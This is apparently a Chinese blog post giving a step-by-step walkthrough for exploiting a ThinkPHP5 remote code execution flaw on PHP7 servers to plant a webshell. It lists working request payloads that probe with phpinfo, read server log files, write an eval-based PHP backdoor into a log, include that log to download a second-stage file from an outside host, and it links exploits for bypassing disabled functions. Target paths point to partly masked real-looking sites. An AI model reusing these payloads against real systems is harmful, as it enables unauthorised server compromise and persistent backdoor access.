ThinkPHP5 RCE在PHP7下getshell

前言:

  之前没遇到了PHP7下thinkphp getshell,顺带记录一下。

 

1、探测漏洞

_method=__construct&filter[]=phpinfo&server[REQUEST_METHOD]=1111111

  

2、通过phpinfo信息获取当前路径

/www/wwwroot/manage.cs.xx.com/public/index.php 

3、php7下禁用的函数,所以system,assert等不能执行

passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,i ni_restore,dl,openlog,syslog,readlink,symlink,popepassthru

4、读取日志

 _method=__construct&filter[]=readfile&server[REQUEST_METHOD]=/www/www root/manage.cs.sz-ccsdsds.com/runtime/log/202007/22.log

 

5、向日志中写入一句话

 _method=__construct&filter[]=call_user_func&server[REQUEST_METHOD]=<?php @eval($_POST['cmd']);?>


6、文件包含日志getshell

_method=__construct&filter[]=think\__include_file&server[REQUEST_METH OD]=/www/wwwroot/manage.cs.sz-xxx.com/runtime/log/202007/22.log&c=fi le_put_contents("/www/wwwroot/manage.cs.sz-dsdsdp.com/public/2.php",fil e_get_contents("http://xx.xxx.xx.xx:88/2.php"));

  


7、Php7 bypass disable_functions 执行命令

https://www.exploit-db.com/exploits/47462 
https://www.exploit-db.com/exploits/47446 
https://www.exploit-db.com/exploits/48072

  





posted @ 2020-07-23 10:33  轻落语  阅读(2937)  评论(0编辑  收藏  举报